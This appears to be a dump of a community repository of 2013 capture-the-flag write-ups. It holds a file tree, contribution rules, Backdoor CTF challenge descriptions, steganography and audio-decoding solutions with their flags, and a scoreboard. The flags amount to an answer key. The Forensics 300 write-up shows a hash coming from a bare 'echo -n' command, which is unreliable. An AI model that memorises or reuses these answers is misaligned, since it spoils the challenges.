├── .gitignore ├── CONTRIBUTING.md ├── README.md ├── backdoorctf-2013 ├── README.md ├── binary │ ├── 50 │ │ ├── README.md │ │ ├── binary50.zip │ │ └── binary50_32bit.zip │ ├── 100 │ │ ├── 5be9af828d2476f4e654 │ │ ├── README.md │ │ ├── binary100.zip │ │ └── binary100_32bit.zip │ ├── 200 │ │ ├── README.md │ │ └── h4x0r.zip │ └── 500 │ │ ├── README.md │ │ └── h4x0r.zip ├── crypto │ ├── 75 │ │ └── README.md │ ├── 250 │ │ └── README.md │ └── 400 │ │ └── README.md ├── forensic │ ├── 150 │ │ ├── README.md │ │ └── wet_QR.png │ ├── 250 │ │ ├── README.md │ │ ├── bbb.png │ │ ├── get.py │ │ └── solved.bmp │ └── 300 │ │ ├── 0.png │ │ ├── 1.png │ │ ├── README.md │ │ ├── siri_audio.zip │ │ └── writeup.png └── scoreboard.txt ├── csaw-quals-2013 ├── README.md ├── crypto │ ├── csawpad-100 │ │ ├── README.md │ │ ├── csawpad-solve.py │ │ └── csawpad.py │ ├── onlythisprogram-300 │ │ ├── README.md │ │ ├── onlythisprogram.tgz │ │ └── source │ │ │ ├── README │ │ │ ├── input │ │ │ ├── Hackers.mid │ │ │ ├── Tux_ecb.jpg │ │ │ ├── diagram.png │ │ │ ├── enigma.jpg │ │ │ ├── key.gz │ │ │ ├── linux-penguin5_blastfishing_com.bmp │ │ │ ├── logo.gif │ │ │ ├── nelson.doc │ │ │ └── shannon1948.pdf │ │ │ ├── onlythisprogram.py │ │ │ ├── output │ │ │ ├── file0.enc │ │ │ ├── file1.enc │ │ │ ├── file2.enc │ │ │ ├── file3.enc │ │ │ ├── file4.enc │ │ │ ├── file5.enc │ │ │ ├── file6.enc │ │ │ ├── file7.enc │ │ │ └── file8.enc │ │ │ ├── runme.sh │ │ │ ├── secretkey.dat │ │ │ └── solve.py │ └── slurp-500 │ │ ├── README.md │ │ └── slurp.py ├── exploitation │ ├── csawdiary-300 │ │ ├── README.md │ │ └── fil_chal │ ├── exploit1-100 │ │ ├── README.md │ │ ├── exploit1 │ │ └── exploit1.c │ ├── exploit2-200 │ │ ├── README.md │ │ ├── e.py │ │ └── exploit2 │ ├── miteegashun-400 │ │ ├── README.md │ │ └── miteegashun │ └── scp-hack-500 │ │ ├── README.md │ │ └── solution.txt ├── misc │ ├── black-and-white-100 │ │ ├── README.md │ │ ├── chal.png │ │ └── key.png │ ├── deeeeeeaaaaaadbeeeeeeeeeef-200 │ │ ├── 1.png │ │ ├── 2.png │ │ ├── IMG_0707.png │ │ ├── README.md │ │ ├── crc_fixd.png │ │ ├── flag.png │ │ ├── resized_for_repo.png │ │ ├── wxh_fixd.png │ │ └── wxh_orig.png │ ├── life-300 │ │ ├── README.md │ │ └── source.txt │ ├── network1-50 │ │ ├── README.md │ │ └── networking.pcap │ └── network2-50 │ │ ├── README.md │ │ ├── networking.pcap │ │ └── networking.pcap.process ├── reversing │ ├── bikinibonanza-150 │ │ ├── README.md │ │ └── bikinibonanza.exe │ ├── crackme-300 │ │ ├── README.md │ │ └── crackme │ ├── csaw2013reversing1-100 │ │ ├── README.md │ │ └── csaw2013reversing1.exe │ ├── csaw2013reversing2-200 │ │ ├── README.md │ │ └── csaw2013reversing2.exe │ ├── dotnet-100 │ │ ├── DotNetReversing.exe │ │ └── README.md │ ├── impossible-500 │ │ ├── README.md │ │ └── impossible.nds │ ├── keygenme-400 │ │ ├── README.md │ │ ├── keygenme-source.txt │ │ ├── keygenme-source │ │ │ ├── LICENSE │ │ │ ├── README.md │ │ │ ├── cpu.cpp │ │ │ ├── cpu.h │ │ │ ├── encrypt.asm │ │ │ ├── instruction.cpp │ │ │ ├── instruction.h │ │ │ ├── keygenme.cpp │ │ │ └── solution │ │ │ │ ├── description.txt │ │ │ │ ├── keygen.cpp │ │ │ │ ├── server.rb │ │ │ │ ├── solver.rb │ │ │ │ └── solvertest.rb │ │ └── keygenme32.elf │ └── noobs-first-firmware-mod-500 │ │ ├── README.md │ │ └── noobs-first-firmware-mod.tgz ├── scoreboard.txt ├── solves.txt └── web │ ├── cryptomatv2-400 │ └── README.md │ ├── guess-harder-100 │ └── README.md │ ├── herpderper-300 │ ├── README.md │ └── herpderper.apk │ ├── nevernote-200 │ └── README.md │ ├── recon │ ├── alex-taylor.txt │ ├── brandon-edwards.txt │ ├── historypeats.txt │ ├── jordan-wiens.txt │ ├── julian-cohen.txt │ ├── kevin-chung.txt │ ├── odin.txt │ └── theodore-reed.txt │ └── widgetcorp-400 │ └── README.md ├── hack-lu-ctf-2013 ├── README.md ├── crypto │ ├── BREW-r-Y │ │ └── README.md │ ├── ECKA │ │ └── README.md │ ├── Geier-s-Lambda │ │ ├── README.md │ │ └── pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs │ └── Marvin-is-plain-Jane │ │ └── README.md ├── exploiting │ ├── Breznparadisebugmaschine │ │ ├── Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe │ │ └── README.md │ ├── Robotic-Superiority │ │ └── README.md │ └── Wannabe │ │ └── README.md ├── internals │ ├── Packed │ │ ├── README.md │ │ └── packed_7245b354be136111061c9a118d6304598f46c767 │ ├── Robot-Plans │ │ └── README.md │ └── What-s-wrong-with-this │ │ ├── README.md │ │ └── hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz ├── misc │ ├── Beer-Pump-Filtration │ │ └── README.md │ ├── For-whom-the-bell-tolls │ │ ├── README.md │ │ └── bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2 │ ├── Geolocation-Flag │ │ └── README.md │ ├── OTP │ │ └── README.md │ └── Roboparty │ │ └── README.md ├── reversing │ ├── ELF │ │ ├── README.md │ │ └── reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308 │ ├── FluxArchiv-Part1 │ │ ├── README.md │ │ └── hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz │ ├── FluxArchiv-Part2 │ │ ├── README.md │ │ └── hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz │ └── RoboAuth │ │ ├── README.md │ │ └── RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe └── web │ ├── Pay-TV │ └── README.md │ └── Robots-Exclusion-Committee │ └── README.md └── pico-ctf-2013 ├── README.md ├── bitwise ├── README.md ├── bitwise.java ├── bitwise.py └── solve.py ├── black-hole ├── 1.png ├── README.md ├── blackhole.img └── solve.png ├── byte-code ├── README.md └── tmpBPWe7T.zip ├── cfg-to-c ├── README.md └── cfg2c │ ├── func1.png │ ├── func2.png │ ├── func3.png │ ├── func4.png │ └── index.html ├── chromatophoria ├── README.md ├── solve.java └── steg.png ├── classic └── README.md ├── client-side-is-the-best-side ├── README.md └── clientside.html ├── core-decryption ├── README.md ├── core_decrypt.tar └── solve.py ├── dark-star ├── README.md ├── darkstar.img └── solve.png ├── ddos-detection ├── README.md ├── conversations.png └── syn_attack.pcap ├── failure-to-boot └── README.md ├── first-contact ├── README.md └── first_contact.pcap ├── getkey ├── README.md └── index.php ├── grep-is-your-friend ├── README.md └── grep.tar ├── in-hex-no-one-can-hear-you-complain ├── README.md ├── kane.docx └── key.png ├── injection ├── README.md └── index.php ├── navsat ├── README.md └── recovery.zip ├── overflow-1 ├── README.md ├── overflow1-3948d17028101c40 └── overflow1-3948d17028101c40.c ├── overflow-2 ├── README.md ├── overflow2-44e63640e033ff2b └── overflow2-44e63640e033ff2b.c ├── overflow-3 ├── README.md ├── overflow3-28d8a442fb232c0c └── overflow3-28d8a442fb232c0c.c ├── overflow-4 ├── README.md ├── overflow4-4834efeff17abdfb └── overflow4-4834efeff17abdfb.c ├── overflow-5 ├── README.md └── overflow5-0353c1a83cb2fa0d ├── php2 └── README.md ├── php3 └── README.md ├── php4 └── README.md ├── pilot-logic ├── README.md ├── pilot_image └── solve.png ├── pretty-hard-programming └── README.md ├── python-eval-1 └── README.md ├── python-eval-2 └── README.md ├── python-eval-3 └── README.md ├── python-eval-4 └── README.md ├── python-eval-5 └── README.md ├── read-the-manual ├── README.md └── tmp2xfLwN.txt ├── robomunication ├── README.md └── robo.mp3 ├── rop-1 ├── README.md ├── SMALL_HINT ├── rop1-fa6168f4d8eba0eb └── rop1.c ├── rop-2 ├── README.md ├── rop2-20f65dd0bcbe267d └── rop2-20f65dd0bcbe267d.c ├── rop-3 ├── README.md ├── rop3-7f3312fe43c46d26 ├── rop3-7f3312fe43c46d26.c └── soln.py ├── rop-4 ├── README.md ├── SMALL_HINT ├── rop4 └── rop4.c ├── rsa ├── README.md ├── rsa.txt ├── solve.py └── solve2.sh ├── second-contact ├── README.md └── kuiper.pcap ├── spaceport-map ├── README.md ├── frame4.gif ├── info.png └── spaceportmap.gif ├── spamcarver ├── README.md ├── newfile.new.jpg └── spamcarver.jpg ├── technician-challenge └── README.md ├── trivial ├── README.md └── encrypt.py ├── try-them-all ├── README.md ├── cracklib-small.txt └── trythemall.js ├── xmlol ├── README.md └── tmpVrg2Ah.xml └── yummy ├── README.md └── yummy.php /.gitignore: -------------------------------------------------------------------------------- 1 | *.DS_Store 2 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contribution guide 2 | 3 | Please take a moment to review this document in order to make the contribution process easy and effective for everyone involved. 4 | 5 | ## Adding a new write-up entry 6 | 7 | 1. Each CTF gets its own folder in the root of this repository. For example, ‘Foo Bar CTF 2015’ would get a folder named `foo-bar-ctf-2015`. 8 | 2. Every CTF challenge gets its own subfolder within that folder with an appendix indicating its value. For example, all files related to the ‘Foo Bar CTF 2015’ challenge named ‘Sucky sandbox’, which is worth `150` points, would be located in `foo-bar-ctf-2015/sucky-sandbox-150`. 9 | 3. Every CTF challenge folder needs a Markdown-formatted `README.md` file, e.g. `foo-bar-ctf-2015/sucky-sandbox-150/README.md`. This file contains any details about the challenge, the main write-up itself, and links to other write-ups and resources. The folder should also contain the source files needed to reproduce the challenge. 10 | 4. Once you’re done adding the entry or making your changes, submit a pull request using the GitHub web interface. 11 | 5. Finally, make sure you follow our committing rules 12 | 13 | ## Changing an existing entry 14 | 15 | 1. Feel free to make any changes you see fit. Add a link to a write-up on your blog, add missing source files, clarify explanations in the write-up, or — if you’ve found a better way to solve a challenge — simplify the existing solution. 16 | 2. Once you’re done, submit a pull request using the GitHub web interface. 17 | 18 | ## Committing rules 19 | These rules exist to keep the repo maintainable and complete. Please consider following them. 20 | 21 | 1. Update the root `big-ctf/README.md` file, when adding a writeup to `big-ctf/task/`. We have three different sections: 22 | * `Completed write-ups` - Tasks, for which there is at least one local repo writeup (see the `Write-up` section of each task) 23 | * `External write-ups only` - Tasks, for which there is at least one external writeup (see the `Other write-ups and resources` section of each task, but no local writeup 24 | * `Missing write-ups` - Tasks, for which there are no writeups available (yet). 25 | 2. If there already exists a writeup in the `Write-up` section and you want to add another local writeup: 26 | - Add another `Alternative write-up` section above the `Other write-ups and resources` section 27 | 3. Do not add files that have a filesize bigger than 15MB to keep the repo relatively small. Upload the file instead to a service or reference it from somewhere else. 28 | 4. Consider following these [committing rules](https://atom.io/docs/latest/contributing#git-commit-messages). For this repo, we like to use these [emojis](http://www.emoji-cheat-sheet.com/): 29 | * :memo: when adding a writeup to the `Write-up` section of a task 30 | * :floppy_disk: when adding resources for a task, e.g. files or scripts 31 | * :link: when adding a writeup link to the `Other write-ups and resources` section of a task 32 | * :pill: when fixing broken links or corrupt Markup stuff 33 | * :books: when updating the structure of this repo or adding a ctf skeleton structure 34 | * :fire: when deleting files 35 | 5. If you want to add a new CTF directory/structure (skeleton) with as little trouble as possible, then consider using the `genctf.py` tool from [our tools repo](https://github.com/ctfs/write-ups-tools/) 36 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF write-ups 2013 2 | 3 | There are some problems with [CTF](https://ctftime.org/ctf-wtf/) write-ups in general: 4 | 5 | * they’re scattered across the interwebs 6 | * they don’t usually include the original files needed to solve the challenge 7 | * some of them are incomplete or skip ‘obvious’ parts of the explanation, and are therefore not as helpful for newcomers 8 | * often they disappear when the owner forgets to renew their domain or shuts down their blog 9 | 10 | This repository aims to solve those problems. 11 | 12 | It’s a collection of CTF source files and write-ups that anyone can contribute to. Did you just publish a CTF write-up? [Let us know](https://github.com/ctfs/write-ups-2013/issues/new), and we’ll add a link to your post — or just add the link yourself and submit a pull request. Spot an issue with a solution? Correct it, and send a pull request. 13 | 14 | ## Contributing 15 | 16 | Please read [CONTRIBUTING.md](CONTRIBUTING.md). 17 | 18 | ## Archive 19 | 20 | * [Write-ups for CTFs that occurred in 2013](https://github.com/ctfs/write-ups-2013) (this repository) 21 | * [Write-ups for CTFs that occurred in 2014](https://github.com/ctfs/write-ups-2014) 22 | * [Write-ups for CTFs that occurred in 2015](https://github.com/ctfs/write-ups-2015) 23 | * [Write-ups for CTFs that occurred in 2016](https://github.com/ctfs/write-ups-2016) 24 | -------------------------------------------------------------------------------- /backdoorctf-2013/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013 write-ups 2 | 3 | * 4 | * [Scoreboard](https://ctftime.org/event/72) or [here](scoreboard.txt) 5 | 6 | ## Completed write-ups 7 | 8 | * [forensic/250](forensic/250) 9 | * [forensic/300](forensic/300) 10 | 11 | ## External write-ups only 12 | 13 | * [binary/50](binary/50) 14 | * [binary/100](binary/100) 15 | 16 | ## Missing write-ups 17 | 18 | * [binary/200](binary/200) 19 | * [binary/500](binary/500) 20 | * [crypto/250](crypto/250) 21 | * [crypto/400](crypto/400) 22 | * [crypto/75](crypto/75) 23 | * [forensic/150](forensic/150) 24 | -------------------------------------------------------------------------------- /backdoorctf-2013/binary/100/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Binary 100 2 | 3 | **Category:** Binary 4 | **Points:** 100 5 | **Solves:** 6 | **Description:** 7 | 8 | > Solve it . As simple as that ! 9 | > 10 | > Here is the source code of that binary . 11 | > 12 | > Flag is the md5 of secret string. 13 | > 14 | > Download the binary [file](binary100.zip) . For 32bit users - [file](binary100_32bit.zip) 15 | 16 | ## Write-up 17 | 18 | (TODO) 19 | 20 | ## Other write-ups and resources 21 | 22 | * 23 | -------------------------------------------------------------------------------- /backdoorctf-2013/binary/100/binary100.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/100/binary100.zip -------------------------------------------------------------------------------- /backdoorctf-2013/binary/100/binary100_32bit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/100/binary100_32bit.zip -------------------------------------------------------------------------------- /backdoorctf-2013/binary/200/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Binary 200 2 | 3 | **Category:** Binary 4 | **Points:** 200 5 | **Solves:** 6 | **Description:** 7 | 8 | > h4x0r, after 10e^46578398239 blinks of the cursor on his windows 98 machine, managed to create something worth selling. 9 | > Now, you would expect him to open source it but then how will he upgrade his Castle? Now you and I don't buy softwares do we? 10 | > And this "Enter the Registration Key" prompt makes you and I want to tear your hairs apart. 11 | > Your job is to get that #$&%$##@ key. This should be easy for us but we want you to 12 | > have the fun. 13 | > 14 | > You can find the software [here](h4x0r.zip) 15 | > 16 | > Get cracking! 17 | 18 | ## Write-up 19 | 20 | (TODO) 21 | 22 | ## Other write-ups and resources 23 | 24 | * none yet -------------------------------------------------------------------------------- /backdoorctf-2013/binary/200/h4x0r.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/200/h4x0r.zip -------------------------------------------------------------------------------- /backdoorctf-2013/binary/50/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Binary 50 2 | 3 | **Category:** Binary 4 | **Points:** 50 5 | **Solves:** 6 | **Description:** 7 | 8 | > One day, after getting tired of being made fun of by all the other hackers, he decided to finally take a look at BASH. 9 | > His first thoughts were "Bash? Bash Windows? Oh those violent script kiddies!". After finishing hundreds of online tutorials, 10 | > he accidentally (obviously)found a flag. His next status update was " The script kiddies will never be able to get the flag from this password protected binary. 11 | > 12 | > How dare he call you and us "script kiddies"?! Take him down. 13 | > Here is the [file](binary50.zip) . For 32bit users - [file](binary50.zip_32bit) 14 | 15 | ## Write-up 16 | 17 | (TODO) 18 | 19 | ## Other write-ups and resources 20 | 21 | * 22 | -------------------------------------------------------------------------------- /backdoorctf-2013/binary/50/binary50.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/50/binary50.zip -------------------------------------------------------------------------------- /backdoorctf-2013/binary/50/binary50_32bit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/50/binary50_32bit.zip -------------------------------------------------------------------------------- /backdoorctf-2013/binary/500/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Binary 500 2 | 3 | **Category:** Binary 4 | **Points:** 500 5 | **Solves:** 6 | **Description:** 7 | 8 | > h4x0r realized that his software had a vulnerability and has fixed the software now. 9 | > After using it free for so much time, no one wants to buy it. Just get us the key again. 10 | > 11 | > You can find the software [here](h4x0r.zip) 12 | > 13 | > Get cracking! 14 | 15 | ## Write-up 16 | 17 | (TODO) 18 | 19 | ## Other write-ups and resources 20 | 21 | * none yet -------------------------------------------------------------------------------- /backdoorctf-2013/binary/500/h4x0r.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/500/h4x0r.zip -------------------------------------------------------------------------------- /backdoorctf-2013/crypto/250/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Crypto 250 2 | 3 | **Category:** Crypto 4 | **Points:** 250 5 | **Solves:** 6 | **Description:** 7 | 8 | > While poking around H4x0r's security systems , two text files containing 16*32 array of hexadecimal charecters . Neither adding nor subtracting the files from each other helped . 9 | > H4x0r seems fond of bases lower than decimal . Unless you manage to crack this , he will succeed in his evil plans to rule the world . 10 | > 11 | > HINT : H4x0r loves binary representation and of course does the opposite of what everyone else does. So when everyone else uses XOR he... 12 | > If after this you still are stuck, this might help you: for some reason he thinks pigs are related to ciphers! 13 | 14 | ## Write-up 15 | 16 | (TODO) 17 | 18 | ## Other write-ups and resources 19 | 20 | * none yet -------------------------------------------------------------------------------- /backdoorctf-2013/crypto/400/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Crypto 400 2 | 3 | **Category:** Crypto 4 | **Points:** 400 5 | **Solves:** 6 | **Description:** 7 | 8 | > Now, this is an open challenge. h4x0r has created his own encryption algorithm and has decided to challenge all the hackers in the world. He has made the code public here. 9 | > 10 | > 11 | > He challenges you to find the text he has encrypted and promises to reward you handsomely if you manage to do so. To make things simpler he has also given you the hint that the text he has encrypted is only alphanumeric. 12 | > 13 | > 14 | > The text encrypted using the above algorithm is: 15 | > 16 | > 
168 232 100 162 135 179 112 100 173 206 106 123 106 195 179 157 123 173
17 | > 18 | > 19 | > The flag is the MD5 of the decrypted text. 20 | > 21 | > 22 | > HINT: Sometimes the most direct approach gives the answer 23 | 24 | ## Write-up 25 | 26 | (TODO) 27 | 28 | ## Other write-ups and resources 29 | 30 | * none yet -------------------------------------------------------------------------------- /backdoorctf-2013/crypto/75/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Crypto 75 2 | 3 | **Category:** Crypto 4 | **Points:** 75 5 | **Solves:** 6 | **Description:** 7 | 8 | > Decrypt this string 'RIVXR ITWZV OHVFM HVBMV HFVHC GLHEG RZHVR VS' 9 | > 10 | > Flag is the MD5 of decoded string. 11 | > 12 | > May the Force be with you ! 13 | > 14 | > HINT: Wait a sec! was that Force or Source! 15 | 16 | ## Write-up 17 | 18 | (TODO) 19 | 20 | ## Other write-ups and resources 21 | 22 | * none yet -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/150/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Forensics 150 2 | 3 | **Category:** Forensics 4 | **Points:** 150 5 | **Solves:** 6 | **Description:** 7 | 8 | > H4x0r decided he needs one more extra layer of advanced security. His access key is a QR code, and keeps the only copy in his wallet. But when leaving his castle he fell into the moat and the QR code got wet and disfigured. Now he cant get back into his own castle and desperately needs a real hacker's help. His post on craigslist says so. This is your chance to get into his head. 9 | > 10 | > Here is the disfigured QR code:- 11 | > 12 | > The Flag is md5 of last 13 characters of password hidden in [the QR](wet_QR.png). 13 | > 14 | > H4x0r promises to reward 150 h4x0rcoins anyone who gives him the password. 15 | > 16 | > HINT: Hmmm... Can't I just try and reverse the fading somehow? 17 | 18 | ## Write-up 19 | 20 | (TODO) 21 | 22 | ## Other write-ups and resources 23 | 24 | * none yet -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/150/wet_QR.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/150/wet_QR.png -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/250/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Forensics 250 2 | 3 | **Category:** Forensics 4 | **Points:** 250 5 | **Solves:** 6 | **Description:** 7 | 8 | > h4x0r is fed up with all your attacks on his castle and has decided to retaliate by attacking us back. He sent us a mail with [this image](bbb.png) as a warning. Hope you can figure out his warning message:- 9 | > 10 | > MD5 of the message is the answer. 11 | 12 | ## Write-up 13 | 14 | We are given a picture: 15 | 16 | ![](bbb.png) 17 | 18 | Using `stegsolve`, we see that this picture contains a hidden binary text: 19 | 20 | ![](solved.bmp) 21 | 22 | Extract these bits and convert them to `0`s and `1`s with this [script](get.py): 23 | 24 | ```bash 25 | $ python get.py 26 | 011011010110111101100100011001010111001001101110011101110110000101110010011001100110000101110010011001010000000000000000000000000000 27 | ``` 28 | 29 | We convert the binary output to ASCII text using a small perl command and pipe the output to `xxd` to avoid scrambling our shell: 30 | 31 | ```bash 32 | $ python get.py | perl -lpe '$_=pack"B*",$_' | xxd 33 | 0000000: 6d6f 6465 726e 7761 7266 6172 6500 0000 modernwarfare... 34 | 0000010: 000a 35 | ``` 36 | 37 | MD5 the resulting readable text and you got the flag: 38 | 39 | ```bash 40 | $ echo modernwarfare | md5 41 | 3c87b2bc2f0e1143ecb67aa8570ffc1b 42 | $ echo -n modernwarfare | md5 43 | d2432052b887f9e09fb8fa44b11861ef 44 | ``` 45 | 46 | The flag is either `3c87b2bc2f0e1143ecb67aa8570ffc1b` or `d2432052b887f9e09fb8fa44b11861ef`. 47 | ## Other write-ups and resources 48 | 49 | * none yet -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/250/bbb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/bbb.png -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/250/get.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | flag_img = Image.open("solved.bmp") 3 | w,h = flag_img.size 4 | msg='' 5 | for x in range(0, flag_img.size[1]): 6 | g,b,a = flag_img.getpixel((x,0)) 7 | if g==255: msg +='0' 8 | else: msg+='1' 9 | print msg 10 | -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/250/solved.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/solved.bmp -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/300/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/0.png -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/300/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/1.png -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/300/README.md: -------------------------------------------------------------------------------- 1 | # Backdoor CTF 2013: Forensics 300 2 | 3 | **Category:** Forensics 4 | **Points:** 300 5 | **Solves:** 6 | **Description:** 7 | 8 | > H4x0r has now learnt that simple text authentications are not the in thing today. Also since voice authentication is all the rage nowadays thanx to siri, he decided to get one for his castle. But he messed it big time and now has a audio file which he himself can't seem to decipher. So now he needs your help to get into his own castle. 9 | > 10 | > You can find the file [here](siri_audio.zip). 11 | > 12 | > Find the hidden passphrase, the flag is the MD5 of the passphrase. 13 | > 14 | > HINT: It is a audioWAVE. Sometimes you might have to see things instead of hearing them. 15 | 16 | ## Write-up 17 | 18 | This writeup is based on [h34dump](http://h34dump.com/2013/03/backdoorctf-2013-forensics-300/)'s writeup. 19 | 20 | We are given an audiowave file and open it with `audacity` and see this waveform: 21 | 22 | ![](writeup.png) 23 | 24 | We see that there are six 16 spikes/ 8 sin waves and imply that we can decode the waves: 25 | 26 | ![](0.png) 27 | 28 | as `0` 29 | 30 | and 31 | 32 | ![](1.png) 33 | 34 | as `1`. 35 | 36 | This results in the bitstream `011000100110000101101011011001000110111101110010`, which can be translated into ASCII characters using a simple perl command: 37 | 38 | 39 | ```bash 40 | $ echo 011000100110000101101011011001000110111101110010 | perl -lpe '$_=pack"B*",$_' 41 | bakdor 42 | $ echo -n bakdor 43 | e1b64df17443b51e3007fd3d5370dca1 44 | ``` 45 | 46 | The flag is `e1b64df17443b51e3007fd3d5370dca1`. 47 | 48 | ## Other write-ups and resources 49 | 50 | * -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/300/siri_audio.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/siri_audio.zip -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/300/writeup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/writeup.png -------------------------------------------------------------------------------- /backdoorctf-2013/scoreboard.txt: -------------------------------------------------------------------------------- 1 | dcua 3815.000 2 | v3l0cityz3r0 3720.000 3 | Headump 3640.000 4 | p!r@t3s 3590.000 5 | Got Root 3515.000 6 | dnivra 3250.000 7 | botnet 3250.000 8 | sbi0s 3250.000 9 | bi0s 3250.000 10 | hellokitty 3225.000 11 | sakshi 3225.000 12 | 2sbi0s 3175.000 13 | 1338-offbyone 3175.000 14 | Beginbi0s 3100.000 15 | Inception 3050.000 16 | Graphite 2925.000 17 | NULL Life 2475.000 18 | ChocolateMakers 1850.000 19 | Akrockzzz 1550.000 20 | YouKnowWho 1425.000 21 | SsoMac 1400.000 22 | Inquisitive 1290.000 23 | hczi0npqu 1275.000 24 | webfuel 1225.000 25 | Rising Force 1200.000 26 | WeLoveCP 1200.000 27 | jayant 1120.000 28 | Testing 1120.000 29 | abhshkdz 1050.000 30 | weareplaying 1050.000 31 | 0x01 1000.000 32 | LOOLOO 1000.000 33 | bithin 975.000 34 | deception 900.000 35 | ufologists 850.000 36 | OneManTeam 775.000 37 | p03p0wn 650.000 38 | Protocol 625.000 39 | PR0T0C0L 625.000 40 | bond 600.000 41 | pwners 500.000 42 | xelenonz 500.000 43 | h4x0r 500.000 44 | MyTeam 425.000 45 | jofrutas 400.000 46 | w0rmicelli 400.000 47 | Spounchers 375.000 48 | redeemer 350.000 49 | The DHARMA Initiative 300.000 50 | pouet 300.000 51 | Nemotest 225.000 52 | Big Boss 200.000 53 | TSTORMXSD 200.000 54 | hack_123 200.000 55 | zorianix 150.000 56 | lolcode 140.000 57 | hawk_eye 50.000 58 | delirium 50.000 59 | A-Team 50.000 60 | Nuts 50.000 61 | TeamNuts 50.000 62 | nk_team 50.000 63 | L0L 50.000 64 | trackdown 50.000 65 | achilles 50.000 66 | D3molition 50.000 67 | Army Ants 50.000 68 | BOTNET_OM 50.000 69 | backdoor 50.000 70 | empire 50.000 71 | ANONYMOUS 50.000 72 | The Agents 50.000 73 | dumbass 50.000 74 | knightwave 50.000 75 | KISS 50.000 76 | oioioi 50.000 77 | GoDFathER 50.000 78 | theDuffers 50.000 79 | dvjbndlsh93 50.000 80 | paglab 20.000 81 | -------------------------------------------------------------------------------- /csaw-quals-2013/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF write-ups 2 | 3 | * 4 | * [Scoreboard](https://ctftime.org/event/96) or [here](scoreboard.txt) 5 | * [Number of solves per task](solves.txt) 6 | 7 | ## Completed write-ups 8 | 9 | * [misc/black-and-white-100](misc/black-and-white-100) 10 | * [misc/deeeeeeaaaaaadbeeeeeeeeeef-200](misc/deeeeeeaaaaaadbeeeeeeeeeef-200) 11 | * [misc/network1-50](misc/network1-50) 12 | * [misc/network2-50](misc/network2-50) 13 | 14 | ## External write-ups only 15 | 16 | * none yet 17 | 18 | ## Missing write-ups 19 | 20 | * [crypto/csawpad-100](crypto/csawpad-100) 21 | * [crypto/onlythisprogram-300](crypto/onlythisprogram-300) 22 | * [crypto/slurp-500](crypto/slurp-500) 23 | * [exploitation/csawdiary-300](exploitation/csawdiary-300) 24 | * [exploitation/exploit1-100](exploitation/exploit1-100) 25 | * [exploitation/exploit2-200](exploitation/exploit2-200) 26 | * [exploitation/miteegashun-400](exploitation/miteegashun-400) 27 | * 